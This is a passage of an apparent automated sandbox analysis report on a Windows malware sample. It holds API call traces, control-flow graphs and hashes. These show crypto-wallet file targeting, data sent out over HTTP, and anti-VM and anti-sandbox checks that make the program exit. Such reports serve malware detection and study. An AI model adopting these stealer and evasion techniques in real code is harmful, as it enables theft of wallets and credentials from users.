                              • GetProcAddress.KERNEL32(75D90000,01295A50), ref: 004DA9A3
                              • GetProcAddress.KERNEL32(6E310000,012ACF78), ref: 004DA9C4
                              • GetProcAddress.KERNEL32(6E310000,01295A70), ref: 004DA9DD
                              • GetProcAddress.KERNEL32(6E310000,012ACF00), ref: 004DA9F5
                              • GetProcAddress.KERNEL32(6E310000,012AD008), ref: 004DAA0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 803cd7ec9d8010d627cea58f24fbac0a9d1d1ba435c8620b238fb3968ce84c41
                              • Instruction ID: b93131fdc8261762c7e05feea493a0acc9ae7f52bcde2c8e64a2347cf25bf08a
                              • Opcode Fuzzy Hash: 803cd7ec9d8010d627cea58f24fbac0a9d1d1ba435c8620b238fb3968ce84c41
                              • Instruction Fuzzy Hash: 7E622BB56782049FC348DFA8ED8895677B9BB8D701710C61BBA09C3274D73DA942CB6C
                              Function 004C48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 4c48d0-4c4992 call 4daab0 call 4c4800 call 4daa50 * 5 InternetOpenA StrCmpCA 816 4c499b-4c499f 801->816 817 4c4994 801->817 818 4c4f1b-4c4f43 InternetCloseHandle call 4dade0 call 4ca210 816->818 819 4c49a5-4c4b1d call 4d8cf0 call 4dac30 call 4dabb0 call 4dab10 * 2 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dac30 call 4dabb0 call 4dab10 * 2 InternetConnectA 816->819 817->816 829 4c4f45-4c4f7d call 4dab30 call 4dacc0 call 4dabb0 call 4dab10 818->829 830 4c4f82-4c4ff2 call 4d8b20 * 2 call 4daab0 call 4dab10 * 8 818->830 819->818 905 4c4b23-4c4b27 819->905 829->830 906 4c4b29-4c4b33 905->906 907 4c4b35 905->907 908 4c4b3f-4c4b72 HttpOpenRequestA 906->908 907->908 909 4c4f0e-4c4f15 InternetCloseHandle 908->909 910 4c4b78-4c4e78 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dacc0 call 4dabb0 call 4dab10 call 4dac30 call 4dabb0 call 4dab10 call 4daa50 call 4dac30 * 2 call 4dabb0 call 4dab10 * 2 call 4dade0 lstrlen call 4dade0 * 2 lstrlen call 4dade0 HttpSendRequestA 908->910 909->818 1021 4c4e82-4c4eac InternetReadFile 910->1021 1022 4c4eae-4c4eb5 1021->1022 1023 4c4eb7-4c4f09 InternetCloseHandle call 4dab10 1021->1023 1022->1023 1024 4c4eb9-4c4ef7 call 4dacc0 call 4dabb0 call 4dab10 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004C4965
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C498A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C4B0A
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004E0DDE,00000000,?,?,00000000,?,",00000000,?,012AE8F8), ref: 004C4E38
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004C4E54
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004C4E68
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004C4E99
                              • InternetCloseHandle.WININET(00000000), ref: 004C4EFD
                              • InternetCloseHandle.WININET(00000000), ref: 004C4F15
                              • HttpOpenRequestA.WININET(00000000,012AE778,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C4B65
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • InternetCloseHandle.WININET(00000000), ref: 004C4F1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: dda0e460d5adf87a3b6a6cdbc56bec3792b9354fecd29fc858689feb76674ff1
                              • Instruction ID: 37feb6920a1dddf647e5d6aa9e85addbd9e3b1f4a8ee7d9050bc03028fbda179
                              • Opcode Fuzzy Hash: dda0e460d5adf87a3b6a6cdbc56bec3792b9354fecd29fc858689feb76674ff1
                              • Instruction Fuzzy Hash: 57121B72910118AACB14EB91CDB6FEEB379AF14304F10419FB14662291DF783F59CB6A
                              Function 004D5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 4d5760-4d57c7 call 4d5d20 call 4dab30 * 3 call 4daa50 * 4 1106 4d57cc-4d57d3 1090->1106 1107 4d57d5-4d5806 call 4dab30 call 4daab0 call 4c1590 call 4d5440 1106->1107 1108 4d5827-4d589c call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1106->1108 1124 4d580b-4d5822 call 4dabb0 call 4dab10 1107->1124 1134 4d58e3-4d58f9 call 4dade0 StrCmpCA 1108->1134 1137 4d589e-4d58de call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1108->1137 1124->1134 1139 4d5a2c-4d5a94 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1134->1139 1140 4d58ff-4d5906 1134->1140 1137->1134 1271 4d5d13-4d5d16 1139->1271 1142 4d590c-4d5913 1140->1142 1143 4d5a2a-4d5aaf call 4dade0 StrCmpCA 1140->1143 1146 4d596e-4d59e3 call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1142->1146 1147 4d5915-4d5969 call 4dab30 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1142->1147 1161 4d5ab5-4d5abc 1143->1161 1162 4d5be1-4d5c49 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1143->1162 1146->1143 1250 4d59e5-4d5a25 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1146->1250 1147->1143 1167 4d5bdf-4d5c64 call 4dade0 StrCmpCA 1161->1167 1168 4d5ac2-4d5ac9 1161->1168 1162->1271 1197 4d5c78-4d5ce1 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1167->1197 1198 4d5c66-4d5c71 Sleep 1167->1198 1175 4d5acb-4d5b1e call 4dab30 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1168->1175 1176 4d5b23-4d5b98 call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 4d5b9a-4d5bda call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1176->1276 1197->1271 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 004DAB30: lstrlen.KERNEL32(004C4F55,?,?,004C4F55,004E0DDF), ref: 004DAB3B
                                • Part of subcall function 004DAB30: lstrcpy.KERNEL32(004E0DDF,00000000), ref: 004DAB95
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5894
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D58F1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5AA7
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004D5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5478
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5568
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D557F
                                • Part of subcall function 004D5510: StrStrA.SHLWAPI(00000000,00000000), ref: 004D55B4
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D55D3
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D55FE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D59DB
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5B90
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5C5C
                              • Sleep.KERNEL32(0000EA60), ref: 004D5C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b311f0758c4772eed45b5840c0dc24964a910a4c16f81756d98d9f51c8bbdec2
                              • Instruction ID: b9f14ccf926d9f128816139c61003f8f784c1926930e2a7b94696589544edb65
                              • Opcode Fuzzy Hash: b311f0758c4772eed45b5840c0dc24964a910a4c16f81756d98d9f51c8bbdec2
                              • Instruction Fuzzy Hash: 72E1A2319101049ACB14FBA1EC76EED737DAF50304F00865FB54666295EF3CAB19CBAA
                              Function 004D19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 4d19f0-4d1a1d call 4dade0 StrCmpCA 1304 4d1a1f-4d1a21 ExitProcess 1301->1304 1305 4d1a27-4d1a41 call 4dade0 1301->1305 1309 4d1a44-4d1a48 1305->1309 1310 4d1a4e-4d1a61 1309->1310 1311 4d1c12-4d1c1d call 4dab10 1309->1311 1313 4d1bee-4d1c0d 1310->1313 1314 4d1a67-4d1a6a 1310->1314 1313->1309 1316 4d1aad-4d1abe StrCmpCA 1314->1316 1317 4d1acf-4d1ae0 StrCmpCA 1314->1317 1318 4d1a85-4d1a94 call 4dab30 1314->1318 1319 4d1b41-4d1b52 StrCmpCA 1314->1319 1320 4d1ba1-4d1bb2 StrCmpCA 1314->1320 1321 4d1bc0-4d1bd1 StrCmpCA 1314->1321 1322 4d1b63-4d1b74 StrCmpCA 1314->1322 1323 4d1b82-4d1b93 StrCmpCA 1314->1323 1324 4d1afd-4d1b0e StrCmpCA 1314->1324 1325 4d1b1f-4d1b30 StrCmpCA 1314->1325 1326 4d1bdf-4d1be9 call 4dab30 1314->1326 1327 4d1a99-4d1aa8 call 4dab30 1314->1327 1328 4d1a71-4d1a80 call 4dab30 1314->1328 1344 4d1aca 1316->1344 1345 4d1ac0-4d1ac3 1316->1345 1346 4d1aee-4d1af1 1317->1346 1347 4d1ae2-4d1aec 1317->1347 1318->1313 1329 4d1b5e 1319->1329 1330 4d1b54-4d1b57 1319->1330 1335 4d1bbe 1320->1335 1336 4d1bb4-4d1bb7 1320->1336 1338 4d1bdd 1321->1338 1339 4d1bd3-4d1bd6 1321->1339 1331 4d1b76-4d1b79 1322->1331 1332 4d1b80 1322->1332 1333 4d1b9f 1323->1333 1334 4d1b95-4d1b98 1323->1334 1348 4d1b1a 1324->1348 1349 4d1b10-4d1b13 1324->1349 1350 4d1b3c 1325->1350 1351 4d1b32-4d1b35 1325->1351 1326->1313 1327->1313 1328->1313 1329->1313 1330->1329 1331->1332 1332->1313 1333->1313 1334->1333 1335->1313 1336->1335 1338->1313 1339->1338 1344->1313 1345->1344 1355 4d1af8 1346->1355 1347->1355 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 004D1A15
                              • ExitProcess.KERNEL32 ref: 004D1A21
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: dbff9185b36ff768cb4e33ab44a7cff738eeac4ade4753d5089a841993ef5144
                              • Instruction ID: 3703b13f0496151f0cd8fb90073cfe9a6f46b81a9606ff021f67efea521517fc
                              • Opcode Fuzzy Hash: dbff9185b36ff768cb4e33ab44a7cff738eeac4ade4753d5089a841993ef5144
                              • Instruction Fuzzy Hash: FF514F74B54209ABCB08DF94D9A4FAE77B9EF44704F10404BE812AB360E778F951CB5A
                              Function 004D6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A24D0), ref: 004D9BF1
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A24E8), ref: 004D9C0A
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2248), ref: 004D9C22
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2350), ref: 004D9C3A
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2230), ref: 004D9C53
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A9158), ref: 004D9C6B
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295DB0), ref: 004D9C83
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295B10), ref: 004D9C9C
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A22F0), ref: 004D9CB4
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A23C8), ref: 004D9CCC
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2338), ref: 004D9CE5
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2380), ref: 004D9CFD
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295B30), ref: 004D9D15
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A23E0), ref: 004D9D2E
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004C11D0: ExitProcess.KERNEL32 ref: 004C1211
                                • Part of subcall function 004C1160: GetSystemInfo.KERNEL32(?), ref: 004C116A
                                • Part of subcall function 004C1160: ExitProcess.KERNEL32 ref: 004C117E
                                • Part of subcall function 004C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004C112B
                                • Part of subcall function 004C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004C1132
                                • Part of subcall function 004C1110: ExitProcess.KERNEL32 ref: 004C1143
                                • Part of subcall function 004C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004C123E
                                • Part of subcall function 004C1220: ExitProcess.KERNEL32 ref: 004C1294
                                • Part of subcall function 004D6A10: GetUserDefaultLangID.KERNEL32 ref: 004D6A14
                                • Part of subcall function 004C1190: ExitProcess.KERNEL32 ref: 004C11C6
                                • Part of subcall function 004D79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                                • Part of subcall function 004D79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                                • Part of subcall function 004D79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                                • Part of subcall function 004D7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                                • Part of subcall function 004D7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                                • Part of subcall function 004D7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D6D88
                              • CloseHandle.KERNEL32(00000000), ref: 004D6D99
                              • Sleep.KERNEL32(00001770), ref: 004D6DA4
                              • CloseHandle.KERNEL32(?,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6DBA
                              • ExitProcess.KERNEL32 ref: 004D6DC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: e768a26e05dfe301e4f1dadc3fa181cfaee51e81c2a5acafd2a5bc30d9d3fe0a
                              • Instruction ID: 3f074996ebf3cc5d4dc7f1814a1278416d07a0fa6090fb5e8ecb82ce3044d838
                              • Opcode Fuzzy Hash: e768a26e05dfe301e4f1dadc3fa181cfaee51e81c2a5acafd2a5bc30d9d3fe0a
                              • Instruction Fuzzy Hash: 30312B31A54108ABCB04F7A2DC76BAE7279AF44704F10451FF11262292DF7C6A06C66E
                              Function 004D6D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 4d6d93 1437 4d6daa 1436->1437 1439 4d6dac-4d6dc2 call 4d6bc0 call 4d5d60 CloseHandle ExitProcess 1437->1439 1440 4d6d5a-4d6d77 call 4dade0 OpenEventA 1437->1440 1446 4d6d79-4d6d91 call 4dade0 CreateEventA 1440->1446 1447 4d6d95-4d6da4 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D6D88
                              • CloseHandle.KERNEL32(00000000), ref: 004D6D99
                              • Sleep.KERNEL32(00001770), ref: 004D6DA4
                              • CloseHandle.KERNEL32(?,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6DBA
                              • ExitProcess.KERNEL32 ref: 004D6DC2
                              Memory Dump Source
